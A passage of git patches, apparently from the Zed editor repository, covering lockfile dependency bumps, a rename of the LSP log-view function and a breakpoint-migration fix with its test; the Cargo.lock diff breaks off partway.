sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==} + hasown@2.0.3: + resolution: {integrity: sha512-ej4AhfhfL2Q2zpMmLo7U1Uv9+PyhIZpgQLGT1F9miIGmiCJIoCgSmczFdrc97mWT4kVY72KA+WnnhJ5pghSvSg==} engines: {node: '>= 0.4'} - http-proxy-agent@5.0.0: - resolution: {integrity: sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w==} - engines: {node: '>= 6'} + http-proxy-agent@7.0.2: + resolution: {integrity: sha512-T1gkAiYYDWYx3V5Bmyu7HcfcvL7mUrTWiM6yOfa3PIphViJ/gFPbvidQ+veqSOHci/PxBcDabeUNCzpOODJZig==} + engines: {node: '>= 14'} - https-proxy-agent@5.0.1: - resolution: {integrity: sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==} - engines: {node: '>= 6'} + https-proxy-agent@7.0.6: + resolution: {integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw==} + engines: {node: '>= 14'} hyperlinker@1.0.0: resolution: {integrity: sha512-Ty8UblRWFEcfSuIaajM34LdPXIhbs1ajEX/BBPv24J+enSVaEVY63xQ6lTO9VRYS5LAoghIG0IDJ+p+IPzKUQQ==} @@ -248,18 +237,15 @@ packages: resolution: {integrity: sha512-p/nXbhSEcu3pZRdkW1OfJhpsVtW1gd4Wa1fnQc9YLiTfAjn0312eMKimbdIQzuZl9aa9xUGaRlP9T/CJE/ditQ==} engines: {node: '>=0.10.0'} - jsonwebtoken@9.0.2: - resolution: {integrity: sha512-PRp66vJ865SSqOlgqS8hujT5U4AOgMfhrwYIuIhfKaoSCZcirrmASQr8CX7cUg+RMih+hgznrjp99o+W4pJLHQ==} + jsonwebtoken@9.0.3: + resolution: {integrity: sha512-MT/xP0CrubFRNLNKvxJ2BYfy53Zkm++5bX9dtuPbqAeQpTVe0MQTFhao8+Cp//EmJp244xt6Drw/GVEGCUj40g==} engines: {node: '>=12', npm: '>=6'} - jwa@1.4.2: - resolution: {integrity: sha512-eeH5JO+21J78qMvTIDdBXidBd6nG2kZjg5Ohz/1fpa28Z4CcsWUzJ1ZZyFq/3z3N17aZy+ZuBoHljASbL1WfOw==} + jwa@2.0.1: + resolution: {integrity: sha512-hRF04fqJIP8Abbkq5NKGN0Bbr3JxlQ+qhZufXVr0DvujKy93ZCbXZMHDL4EOtodSbCWxOqR8MS1tXA5hwqCXDg==} - jws@3.2.2: - resolution: {integrity: sha512-YHlZCB6lMTllWDtSPHz/ZXTsi8S00usEV6v1tjq8tOUZzw7DpSDWVXjXDre6ed1w/pd495ODpHZYSdkRTsa0HA==} - - lodash.find@4.6.0: - resolution: {integrity: sha512-yaRZoAV3Xq28F1iafWN1+a0rflOej93l1DQUejs3SZ41h2O9UJBoS9aueGjPDgAl4B6tPC0NuuchLKaDQQ3Isg==} + jws@4.0.1: + resolution: {integrity: sha512-EKI/M/yqPncGUUh44xz0PxSidXFr/+r0pA70+gIYhjv+et7yxM+s29Y+VGDkovRofQem0fs7Uvf4+YmAdyRduA==} lodash.includes@4.3.0: resolution: {integrity: sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w==} @@ -282,9 +268,6 @@ packages: lodash.isstring@4.0.1: resolution: {integrity: sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw==} - lodash.keys@4.2.0: - resolution: {integrity: sha512-J79MkJcp7Df5mizHiVNpjoHXLi4HLjh9VLS/M7lQSGoQ+0oQ+lWEigREkqKyizPB1IawvQLLKY8mzEcm1tkyxQ==} - lodash.mapvalues@4.6.0: resolution: {integrity: sha512-JPFqXFeZQ7BfS00H58kClY7SPVeHertPE0lNuCyZ26/XlN8TvakYD7b9bGyNmXbT/D3BbtPAAmq90gPWqLkxlQ==} @@ -333,27 +316,19 @@ packages: override-require@1.1.1: resolution: {integrity: sha512-eoJ9YWxFcXbrn2U8FKT6RV+/Kj7fiGAB1VvHzbYKt8xM5ZuKZgCGvnHzDxmreEjcBH28ejg5MiOH4iyY1mQnkg==} - p-limit@2.3.0: - resolution: {integrity: sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==} - engines: {node: '>=6'} - - p-try@2.2.0: - resolution: {integrity: sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==} - engines: {node: '>=6'} - parse-diff@0.7.1: resolution: {integrity: sha512-1j3l8IKcy4yRK2W4o9EYvJLSzpAVwz4DXqCewYyx2vEwk2gcf3DBPqc8Fj4XV3K33OYJ08A8fWwyu/ykD/HUSg==} - parse-github-url@1.0.3: - resolution: {integrity: sha512-tfalY5/4SqGaV/GIGzWyHnFjlpTPTNpENR9Ea2lLldSJ8EWXMsvacWucqY3m3I4YPtas15IxTLQVQ5NSYXPrww==} + parse-github-url@1.0.4: + resolution: {integrity: sha512-CEtCOt55fHmd6DpBc/N7H5NC4vJpcquhzzs9Iw2mRj8bVxo1O5TQI5MXKOMO7+yBOqD+5dKCCRK4Kj1KskZc6Q==} engines: {node: '>= 0.10'} hasBin: true parse-link-header@2.0.0: resolution: {integrity: sha512-xjU87V0VyHZybn2RrCX5TIFGxTVZE6zqqZWMPlIKiSKuWh/X5WZdt+w1Ki1nXB+8L/KtL+nZ4iq+sfI6MrhhMw==} - picomatch@2.3.1: - resolution: {integrity: sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==} + picomatch@2.3.2: + resolution: {integrity: sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==} engines: {node: '>=8.6'} pinpoint@1.1.0: @@ -363,8 +338,8 @@ packages: resolution: {integrity: sha512-rksPWtoZb2ZpT5OVgtmy0KHVM+Dca3iVwWY9ifwhcexfjebtgjg3wmrUt9PvJ59XIYBcknQeYHD8IAnVlh9lAw==} hasBin: true - qs@6.14.0: - resolution: {integrity: sha512-YWWTjgABSKcvs/nWBi9PycY/JiPJqOD4JA6o9Sej2AtvSGarXxKC3OQSk4pAarbdQlKAh5D4FCQkJNkW+GAn3w==} + qs@6.15.1: + resolution: {integrity: sha512-6YHEFRL9mfgcAvql/XhwTvf5jKcOiiupt2FiJxHkiX1z4j7WL8J/jRHYLluORvc1XxB5rV20KoeK00gVJamspg==} engines: {node: '>=0.6'} readline-sync@1.4.10: @@ -385,13 +360,13 @@ packages: safe-buffer@5.2.1: resolution: {integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==} - semver@7.7.2: - resolution: {integrity: sha512-RF0Fw+rO5AMf9MAyaRXI4AV0Ulj5lMHqVxxdSgiVbixSCXoEmmX/jk0CuJw4+3SqroYO9VoUh+HcuJivvtJemA==} + semver@7.7.4: + resolution: {integrity: sha512-vFKC2IEtQnVhpT78h1Yp8wzwrf8CM+MzKMHGJZfBtzhZNycRFnXsHk6E5TxIkkMsgNS7mdX3AGB7x2QM2di4lA==} engines: {node: '>=10'} hasBin: true - side-channel-list@1.0.0: - resolution: {integrity: sha512-FCLHtRD/gnpCiCHEiJLOwdmFP+wzCmDEkc9y7NsYxeF4u7Btsn1ZuwgwJGxImImHicJArLP4R0yX4c2KCrMrTA==} + side-channel-list@1.0.1: + resolution: {integrity: sha512-mjn/0bi/oUURjc5Xl7IaWi/OJJJumuoJFQJfDDyO46+hBWsfaVM65TBHq2eoZBhzl9EchxOijpkbRC8SVBQU0w==} engines: {node: '>= 0.4'} side-channel-map@1.0.1: @@ -406,13 +381,17 @@ packages: resolution: {integrity: sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==} engines: {node: '>= 0.4'} - supports-color@5.5.0: - resolution: {integrity: sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==} - engines: {node: '>=4'} + supports-color@10.2.2: + resolution: {integrity: sha512-SS+jx45GF1QjgEXQx4NJZV9ImqmO2NPz5FNsIHrsDjh2YsHnawpan7SNQ1o8NuhrbHZy9AZhIoCUiCeaW/C80g==} + engines: {node: '>=18'} - supports-hyperlinks@1.0.1: - resolution: {integrity: sha512-HHi5kVSefKaJkGYXbDuKbUGRVxqnWGn3J2e39CYcNJEfWciGq2zYtOhXLTlvrOZW1QU7VX67w7fMmWafHX9Pfw==} - engines: {node: '>=4'} + supports-color@7.2.0: + resolution: {integrity: sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==} + engines: {node: '>=8'} + + supports-hyperlinks@4.4.0: + resolution: {integrity: sha512-UKbpT93hN5Nr9go5UY7bopIB9YQlMz9nm/ct4IXt/irb5YRkn9WaqrOBJGZ5Pwvsd5FQzSVeYlGdXoCAPQZrPg==} + engines: {node: '>=20'} to-regex-range@5.0.1: resolution: {integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==} @@ -445,12 +424,12 @@ snapshots: '@gitbeaker/core@38.12.1': dependencies: '@gitbeaker/requester-utils': 38.12.1 - qs: 6.14.0 + qs: 6.15.1 xcase: 2.0.1 '@gitbeaker/requester-utils@38.12.1': dependencies: - qs: 6.14.0 + qs: 6.15.1 xcase: 2.0.1 '@gitbeaker/rest@38.12.1': @@ -521,17 +500,11 @@ snapshots: dependencies: '@octokit/openapi-types': 24.2.0 - '@tootallnate/once@2.0.0': {} - - agent-base@6.0.2: - dependencies: - debug: 4.4.1 - transitivePeerDependencies: - - supports-color + agent-base@7.1.4: {} - ansi-styles@3.2.1: + ansi-styles@4.3.0: dependencies: - color-convert: 1.9.3 + color-convert: 2.0.1 async-retry@1.2.3: dependencies: @@ -555,48 +528,44 @@ snapshots: call-bind-apply-helpers: 1.0.2 get-intrinsic: 1.3.0 - chalk@2.4.2: + chalk@4.1.2: dependencies: - ansi-styles: 3.2.1 - escape-string-regexp: 1.0.5 - supports-color: 5.5.0 + ansi-styles: 4.3.0 + supports-color: 7.2.0 - color-convert@1.9.3: + color-convert@2.0.1: dependencies: - color-name: 1.1.3 + color-name: 1.1.4 - color-name@1.1.3: {} + color-name@1.1.4: {} colors@1.4.0: {} commander@2.20.3: {} - core-js@3.45.1: {} + core-js@3.49.0: {} danger-plugin-pr-hygiene@0.7.1: {} - danger@13.0.4: + danger@13.0.7: dependencies: '@gitbeaker/rest': 38.12.1 '@octokit/rest': 20.1.2 async-retry: 1.2.3 - chalk: 2.4.2 + chalk: 4.1.2 commander: 2.20.3 - core-js: 3.45.1 - debug: 4.4.1 + core-js: 3.49.0 + debug: 4.4.3 fast-json-patch: 3.1.1 - get-stdin: 6.0.0 - http-proxy-agent: 5.0.0 - https-proxy-agent: 5.0.1 + http-proxy-agent: 7.0.2 + https-proxy-agent: 7.0.6 hyperlinker: 1.0.0 ini: 5.0.0 json5: 2.2.3 jsonpointer: 5.0.1 - jsonwebtoken: 9.0.2 - lodash.find: 4.6.0 + jsonwebtoken: 9.0.3 lodash.includes: 4.3.0 lodash.isobject: 3.0.2 - lodash.keys: 4.2.0 lodash.mapvalues: 4.6.0 lodash.memoize: 4.1.2 memfs-or-file-map-to-github-branch: 1.3.0 @@ -604,21 +573,20 @@ snapshots: node-cleanup: 2.1.2 node-fetch: 2.7.0 override-require: 1.1.1 - p-limit: 2.3.0 parse-diff: 0.7.1 - parse-github-url: 1.0.3 + parse-github-url: 1.0.4 parse-link-header: 2.0.0 pinpoint: 1.1.0 prettyjson: 1.2.5 readline-sync: 1.4.10 regenerator-runtime: 0.13.11 require-from-string: 2.0.2 - supports-hyperlinks: 1.0.1 + supports-hyperlinks: 4.4.0 transitivePeerDependencies: - encoding - supports-color - debug@4.4.1: + debug@4.4.3: dependencies: ms: 2.1.3 @@ -642,8 +610,6 @@ snapshots: dependencies: es-errors: 1.3.0 - escape-string-regexp@1.0.5: {} - fast-json-patch@3.1.1: {} fill-range@7.1.1: @@ -662,7 +628,7 @@ snapshots: get-proto: 1.0.1 gopd: 1.2.0 has-symbols: 1.1.0 - hasown: 2.0.2 + hasown: 2.0.3 math-intrinsics: 1.1.0 get-proto@1.0.1: @@ -670,32 +636,29 @@ snapshots: dunder-proto: 1.0.1 es-object-atoms: 1.1.1 - get-stdin@6.0.0: {} - gopd@1.2.0: {} - has-flag@2.0.0: {} + has-flag@4.0.0: {} - has-flag@3.0.0: {} + has-flag@5.0.1: {} has-symbols@1.1.0: {} - hasown@2.0.2: + hasown@2.0.3: dependencies: function-bind: 1.1.2 - http-proxy-agent@5.0.0: + http-proxy-agent@7.0.2: dependencies: - '@tootallnate/once': 2.0.0 - agent-base: 6.0.2 - debug: 4.4.1 + agent-base: 7.1.4 + debug: 4.4.3 transitivePeerDependencies: - supports-color - https-proxy-agent@5.0.1: + https-proxy-agent@7.0.6: dependencies: - agent-base: 6.0.2 - debug: 4.4.1 + agent-base: 7.1.4 + debug: 4.4.3 transitivePeerDependencies: - supports-color @@ -709,9 +672,9 @@ snapshots: jsonpointer@5.0.1: {} - jsonwebtoken@9.0.2: + jsonwebtoken@9.0.3: dependencies: - jws: 3.2.2 + jws: 4.0.1 lodash.includes: 4.3.0 lodash.isboolean: 3.0.3 lodash.isinteger: 4.0.4 @@ -720,21 +683,19 @@ snapshots: lodash.isstring: 4.0.1 lodash.once: 4.1.1 ms: 2.1.3 - semver: 7.7.2 + semver: 7.7.4 - jwa@1.4.2: + jwa@2.0.1: dependencies: buffer-equal-constant-time: 1.0.1 ecdsa-sig-formatter: 1.0.11 safe-buffer: 5.2.1 - jws@3.2.2: + jws@4.0.1: dependencies: - jwa: 1.4.2 + jwa: 2.0.1 safe-buffer: 5.2.1 - lodash.find@4.6.0: {} - lodash.includes@4.3.0: {} lodash.isboolean@3.0.3: {} @@ -749,8 +710,6 @@ snapshots: lodash.isstring@4.0.1: {} - lodash.keys@4.2.0: {} - lodash.mapvalues@4.6.0: {} lodash.memoize@4.1.2: {} @@ -766,7 +725,7 @@ snapshots: micromatch@4.0.8: dependencies: braces: 3.0.3 - picomatch: 2.3.1 + picomatch: 2.3.2 minimist@1.2.8: {} @@ -786,21 +745,15 @@ snapshots: override-require@1.1.1: {} - p-limit@2.3.0: - dependencies: - p-try: 2.2.0 - - p-try@2.2.0: {} - parse-diff@0.7.1: {} - parse-github-url@1.0.3: {} + parse-github-url@1.0.4: {} parse-link-header@2.0.0: dependencies: xtend: 4.0.2 - picomatch@2.3.1: {} + picomatch@2.3.2: {} pinpoint@1.1.0: {} @@ -809,7 +762,7 @@ snapshots: colors: 1.4.0 minimist: 1.2.8 - qs@6.14.0: + qs@6.15.1: dependencies: side-channel: 1.1.0 @@ -823,9 +776,9 @@ snapshots: safe-buffer@5.2.1: {} - semver@7.7.2: {} + semver@7.7.4: {} - side-channel-list@1.0.0: + side-channel-list@1.0.1: dependencies: es-errors: 1.3.0 object-inspect: 1.13.4 @@ -849,18 +802,20 @@ snapshots: dependencies: es-errors: 1.3.0 object-inspect: 1.13.4 - side-channel-list: 1.0.0 + side-channel-list: 1.0.1 side-channel-map: 1.0.1 side-channel-weakmap: 1.0.2 - supports-color@5.5.0: + supports-color@10.2.2: {} + + supports-color@7.2.0: dependencies: - has-flag: 3.0.0 + has-flag: 4.0.0 - supports-hyperlinks@1.0.1: + supports-hyperlinks@4.4.0: dependencies: - has-flag: 2.0.0 - supports-color: 5.5.0 + has-flag: 5.0.1 + supports-color: 10.2.2 to-regex-range@5.0.1: dependencies: From 4241b8d4a88b49820cc5aab740604c60620352c2 Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 12:39:38 +0200 Subject: [PATCH 158/231] language_tools: Open server logs instead of server trace on View Logs (#55621) Release Notes: - N/A or Added/Fixed/Improved ... --- crates/language_tools/src/lsp_button.rs | 2 +- crates/language_tools/src/lsp_log_view.rs | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/crates/language_tools/src/lsp_button.rs b/crates/language_tools/src/lsp_button.rs index 85ab4684351195..8fbe4385a172f3 100644 --- a/crates/language_tools/src/lsp_button.rs +++ b/crates/language_tools/src/lsp_button.rs @@ -420,7 +420,7 @@ impl LanguageServerState { let workspace_for_debug = workspace.clone(); let server_selector_for_debug = server_selector.clone(); submenu = submenu.entry("View Logs", None, move |window, cx| { - lsp_log_view::open_server_trace( + lsp_log_view::open( &lsp_logs_for_debug, workspace_for_debug.clone(), server_selector_for_debug.clone(), diff --git a/crates/language_tools/src/lsp_log_view.rs b/crates/language_tools/src/lsp_log_view.rs index 06c7e9f77f6c60..a54f2961c79096 100644 --- a/crates/language_tools/src/lsp_log_view.rs +++ b/crates/language_tools/src/lsp_log_view.rs @@ -28,7 +28,7 @@ use workspace::{ use crate::get_or_create_tool; -pub fn open_server_trace( +pub fn open( log_store: &Entity, workspace: WeakEntity, server: LanguageServerSelector, @@ -67,7 +67,7 @@ pub fn open_server_trace( } }; if let Some(server_id) = server_id { - log_view.show_rpc_trace_for_server(server_id, window, cx); + log_view.show_logs_for_server(server_id, window, cx); } }); }) From 4cecb742795a81e8349504af69a59004b980e27b Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 12:39:52 +0200 Subject: [PATCH 159/231] editor: Fix stale breakpoints when re-opening buffers for a saved file (#55610) Fixes ZED-73M Release Notes: - N/A or Added/Fixed/Improved ... --- crates/editor/src/editor_tests.rs | 105 +++++++++++++++++- .../project/src/debugger/breakpoint_store.rs | 25 ++++- 2 files changed, 127 insertions(+), 3 deletions(-) diff --git a/crates/editor/src/editor_tests.rs b/crates/editor/src/editor_tests.rs index 05fb9425c6a0b0..03f332821a8346 100644 --- a/crates/editor/src/editor_tests.rs +++ b/crates/editor/src/editor_tests.rs @@ -41,7 +41,7 @@ use multi_buffer::{IndentGuide, MultiBuffer, MultiBufferOffset, MultiBufferOffse use parking_lot::Mutex; use pretty_assertions::{assert_eq, assert_ne}; use project::{ - FakeFs, Project, + FakeFs, Project, ProjectPath, bookmark_store::SerializedBookmark, debugger::breakpoint_store::{BreakpointState, SourceBreakpoint}, project_settings::LspSettings, @@ -27994,6 +27994,109 @@ async fn test_breakpoint_toggling(cx: &mut TestAppContext) { assert_breakpoint(&breakpoints, &abs_path, vec![]); } +#[gpui::test] +async fn test_breakpoint_after_save_as_existing_path(cx: &mut TestAppContext) { + init_test(cx, |_| {}); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/a"), + json!({ + "main.rs": "First line\nSecond line\nThird line\nFourth line", + }), + ) + .await; + let project = Project::test(fs, [path!("/a").as_ref()], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = + multi_workspace.read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone()); + + let worktree_id = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + + let first_buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree_id, rel_path("main.rs")), cx) + }) + .await + .unwrap(); + + let (first_editor, cx) = cx.add_window_view(|window, cx| { + Editor::new( + EditorMode::full(), + MultiBuffer::build_from_buffer(first_buffer, cx), + Some(project.clone()), + window, + cx, + ) + }); + + first_editor.update_in(cx, |editor, window, cx| { + editor.toggle_breakpoint(&actions::ToggleBreakpoint, window, cx); + }); + + let replacement_buffer = project.update(cx, |project, cx| { + project.create_local_buffer("Alpha\nBeta\nGamma", None, true, cx) + }); + project + .update(cx, |project, cx| { + project.save_buffer_as( + replacement_buffer.clone(), + ProjectPath { + worktree_id, + path: rel_path("main.rs").into(), + }, + cx, + ) + }) + .await + .unwrap(); + + let (replacement_editor, cx) = cx.add_window_view(|window, cx| { + Editor::new( + EditorMode::full(), + MultiBuffer::build_from_buffer(replacement_buffer, cx), + Some(project.clone()), + window, + cx, + ) + }); + + replacement_editor.update_in(cx, |editor, window, cx| { + editor.move_down(&MoveDown, window, cx); + editor.toggle_breakpoint(&actions::ToggleBreakpoint, window, cx); + }); + + let project_path = first_editor.update(cx, |editor, cx| editor.project_path(cx).unwrap()); + let abs_path = project.read_with(cx, |project, cx| { + project + .absolute_path(&project_path, cx) + .map(Arc::from) + .unwrap() + }); + + let breakpoints = first_editor.update(cx, |editor, cx| { + editor + .breakpoint_store() + .as_ref() + .unwrap() + .read(cx) + .source_breakpoints_from_path(&abs_path, cx) + }); + + assert_eq!( + vec![0, 1], + breakpoints + .into_iter() + .map(|breakpoint| breakpoint.row) + .collect::>() + ); +} + #[gpui::test] async fn test_log_breakpoint_editing(cx: &mut TestAppContext) { init_test(cx, |_| {}); diff --git a/crates/project/src/debugger/breakpoint_store.rs b/crates/project/src/debugger/breakpoint_store.rs index 50df9ae3125d3d..f307afe888a18a 100644 --- a/crates/project/src/debugger/breakpoint_store.rs +++ b/crates/project/src/debugger/breakpoint_store.rs @@ -16,7 +16,7 @@ use rpc::{ proto::{self}, }; use std::{hash::Hash, ops::Range, path::Path, sync::Arc, u32}; -use text::{Point, PointUtf16}; +use text::{Bias, Point, PointUtf16, Unclipped}; use util::maybe; use crate::{ProjectPath, buffer_store::BufferStore, worktree_store::WorktreeStore}; @@ -415,7 +415,28 @@ impl BreakpointStore { let breakpoint_set = self .breakpoints .entry(abs_path.clone()) - .or_insert_with(|| BreakpointsInFile::new(buffer, cx)); + .or_insert_with(|| BreakpointsInFile::new(buffer.clone(), cx)); + + // Buffers changed for the file, migrate breakpoints to the new buffer + if breakpoint_set.buffer != buffer { + let old_snapshot = breakpoint_set.buffer.read(cx).snapshot(); + let new_snapshot = buffer.read(cx).snapshot(); + let breakpoints = breakpoint_set + .breakpoints + .drain(..) + .map(|mut breakpoint| { + let old_position = + old_snapshot.summary_for_anchor::(breakpoint.position()); + let new_position = PointUtf16::new(old_position.row, 0); + let new_position = + new_snapshot.clip_point_utf16(Unclipped(new_position), Bias::Left); + breakpoint.bp.position = new_snapshot.anchor_after(new_position); + breakpoint + }) + .collect(); + *breakpoint_set = BreakpointsInFile::new(buffer, cx); + breakpoint_set.breakpoints = breakpoints; + } match edit_action { BreakpointEditAction::Toggle => { From 7482c8d9f193c71dfec2de356fe62da2abd4e217 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Mon, 4 May 2026 12:42:34 +0200 Subject: [PATCH 160/231] Bump dependencies with warnings (#55614) Updates dependencies with potential warnings. - **Update quinn-proto** - **Update awc-lc-rs** - **Update openssl** - **Bump rustls** - **Update aws crates** - **Bump rand** Release Notes: - N/A --- Cargo.lock | 450 ++++++++++++++++++++++++++++------------------------- 1 file changed, 234 insertions(+), 216 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 1dde4ac88509ad..26c34c1fcc3184 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -31,7 +31,7 @@ dependencies = [ "portable-pty", "project", "prompt_store", - "rand 0.9.3", + "rand 0.9.4", "serde", "serde_json", "settings", @@ -85,7 +85,7 @@ dependencies = [ "log", "pretty_assertions", "project", - "rand 0.9.3", + "rand 0.9.4", "serde_json", "settings", "telemetry", @@ -189,7 +189,7 @@ dependencies = [ "pretty_assertions", "project", "prompt_store", - "rand 0.9.3", + "rand 0.9.4", "regex", "reqwest_client", "rust-embed", @@ -404,7 +404,7 @@ dependencies = [ "project", "prompt_store", "proto", - "rand 0.9.3", + "rand 0.9.4", "release_channel", "remote", "remote_connection", @@ -1145,7 +1145,7 @@ dependencies = [ "pin-project-lite", "rustls-pki-types", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tungstenite 0.27.0", ] @@ -1349,9 +1349,9 @@ dependencies = [ [[package]] name = "aws-config" -version = "1.8.10" +version = "1.8.14" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1856b1b48b65f71a4dd940b1c0931f9a7b646d4a924b9828ffefc1454714668a" +checksum = "8a8fc176d53d6fe85017f230405e3255cedb4a02221cb55ed6d76dccbbb099b2" dependencies = [ "aws-credential-types", "aws-runtime", @@ -1379,9 +1379,9 @@ dependencies = [ [[package]] name = "aws-credential-types" -version = "1.2.10" +version = "1.2.12" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b01c9521fa01558f750d183c8c68c81b0155b9d193a4ba7f84c36bd1b6d04a06" +checksum = "e26bbf46abc608f2dc61fd6cb3b7b0665497cc259a21520151ed98f8b37d2c79" dependencies = [ "aws-smithy-async", "aws-smithy-runtime-api", @@ -1391,9 +1391,9 @@ dependencies = [ [[package]] name = "aws-lc-rs" -version = "1.15.4" +version = "1.16.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7b7b6141e96a8c160799cc2d5adecd5cbbe5054cb8c7c4af53da0f83bb7ad256" +checksum = "0ec6fb3fe69024a75fa7e1bfb48aa6cf59706a101658ea01bfd33b2b248a038f" dependencies = [ "aws-lc-sys", "untrusted 0.7.1", @@ -1402,9 +1402,9 @@ dependencies = [ [[package]] name = "aws-lc-sys" -version = "0.37.0" +version = "0.40.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c34dda4df7017c8db52132f0f8a2e0f8161649d15723ed63fc00c82d0f2081a" +checksum = "f50037ee5e1e41e7b8f9d161680a725bd1626cb6f8c7e901f91f942850852fe7" dependencies = [ "cc", "cmake", @@ -1414,9 +1414,9 @@ dependencies = [ [[package]] name = "aws-runtime" -version = "1.5.16" +version = "1.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ce527fb7e53ba9626fc47824f25e256250556c40d8f81d27dd92aa38239d632" +checksum = "b0f92058d22a46adf53ec57a6a96f34447daf02bff52e8fb956c66bcd5c6ac12" dependencies = [ "aws-credential-types", "aws-sigv4", @@ -1428,9 +1428,12 @@ dependencies = [ "aws-smithy-types", "aws-types", "bytes 1.11.1", + "bytes-utils", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "http-body 0.4.6", + "http-body 1.0.1", "percent-encoding", "pin-project-lite", "tracing", @@ -1439,9 +1442,9 @@ dependencies = [ [[package]] name = "aws-sdk-bedrockruntime" -version = "1.113.0" +version = "1.125.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d5d2b8f081b9e8ff455b8dd7387b6b02263c3dac73172d188d2b523ff1e775e9" +checksum = "731e9a808701bdc7c6e27dfbc284f5b40c30ac0392a2e58e3bc855b243a7c967" dependencies = [ "aws-credential-types", "aws-runtime", @@ -1450,6 +1453,7 @@ dependencies = [ "aws-smithy-eventstream", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1457,16 +1461,17 @@ dependencies = [ "bytes 1.11.1", "fastrand 2.3.0", "http 0.2.12", - "hyper 0.14.32", + "http 1.3.1", + "http-body-util", "regex-lite", "tracing", ] [[package]] name = "aws-sdk-kinesis" -version = "1.95.0" +version = "1.100.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9c3b2ce941308de56f5c2f69490497610e1a815ce968c9ac0796ab165f25205d" +checksum = "5769458ed398a643d6f0a6307077311fe253655d9f3ecc3e53069dc61cbcc98c" dependencies = [ "aws-credential-types", "aws-runtime", @@ -1474,6 +1479,7 @@ dependencies = [ "aws-smithy-eventstream", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1481,15 +1487,16 @@ dependencies = [ "bytes 1.11.1", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "regex-lite", "tracing", ] [[package]] name = "aws-sdk-s3" -version = "1.112.0" +version = "1.123.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eee73a27721035c46da0572b390a69fbdb333d0177c24f3d8f7ff952eeb96690" +checksum = "c018f22146966fdd493a664f62ee2483dff256b42a08c125ab6a084bde7b77fe" dependencies = [ "aws-credential-types", "aws-runtime", @@ -1499,6 +1506,7 @@ dependencies = [ "aws-smithy-eventstream", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1510,7 +1518,7 @@ dependencies = [ "hmac", "http 0.2.12", "http 1.3.1", - "http-body 0.4.6", + "http-body 1.0.1", "lru", "percent-encoding", "regex-lite", @@ -1521,15 +1529,16 @@ dependencies = [ [[package]] name = "aws-sdk-sso" -version = 